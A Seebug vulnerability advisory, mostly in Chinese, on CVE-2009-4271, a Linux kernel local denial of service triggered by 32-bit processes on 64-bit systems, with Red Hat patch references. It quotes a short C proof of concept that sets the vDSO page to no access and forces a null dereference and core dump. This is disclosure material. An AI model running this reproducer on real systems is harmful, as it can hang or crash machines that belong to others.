Lucene search
RootSSV:19310HistoryMar 21, 2010 - 12:00 a.m.
Linux Kernel 64位系统上32位进程本地拒绝服务漏洞
2010-03-2100:00:00
Root
www.seebug.org
8
0.0004 Low
EPSS
Percentile
5.7%
CVE(CAN) ID: CVE-2009-4271
Linux Kernel是开放源码操作系统Linux所使用的内核。
Linux Kernel中存在空指针引用漏洞。在core dump期间,内核没有检查虚拟动态链接对象是否可访问。在Intel 64和AMD64系统上,本地非特权用户可以通过运行特制的32位应用程序来利用这个漏洞导致内核忙碌。
Linux kernel 2.6.x
厂商补丁:
RedHat
RedHat已经为此发布了一个安全公告(RHSA-2010:0146-01)以及相应补丁:
RHSA-2010:0146-01:Important: kernel security and bug fix update
链接:https://www.redhat.com/support/errata/RHSA-2010-0146.html
Would this be a valid reproducer? :
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
int main(){
FILE *f;
char line[256];
void *x,*y;
f = fopen("/proc/self/maps","r");
if (!f) exit(1);
x=y=NULL;
while (fgets(line,sizeof(line),f)) {
if (strstr(line,"vdso")) {
sscanf(line,"%p-%p ",&x,&y);
fprintf(stderr,"vdso %x\n", x);
break;
}
}
if (!x) exit(1);
mprotect(x,4096, PROT_NONE);
*(char*)NULL = NULL;
}
Ciao, Marcus
Related
cve
cve
CVE-2009-4271
2010-03-19 19:30:00
prion
prion
Design/Logic Flaw
2010-03-19 19:30:00
ubuntucve
ubuntucve
CVE-2009-4271
2010-03-19 00:00:00
oraclelinux
oraclelinux
kernel security and bug fix update
2010-03-17 00:00:00
nessus
nessus
Scientific Linux Security Update : kernel on SL4.x i386/x86_64
2012-08-01 00:00:00
CentOS 4 : kernel (CESA-2010:0146)
2010-03-19 00:00:00
Oracle Linux 4 : kernel (ELSA-2010-0146)
2013-07-12 00:00:00
openvas
openvas
RedHat Update for kernel RHSA-2010:0146-01
2010-03-22 00:00:00
RedHat Update for kernel RHSA-2010:0146-01
2010-03-22 00:00:00
Ubuntu: Security Advisory (USN-947-2)
2010-06-07 00:00:00
centos
centos
kernel security update
2010-03-17 18:19:30
redhat
redhat
(RHSA-2010:0146) Important: kernel security and bug fix update
2010-03-16 00:00:00
ubuntu
ubuntu
Linux kernel vulnerabilities
2010-06-03 00:00:00
Linux kernel regression
2010-06-04 00:00:00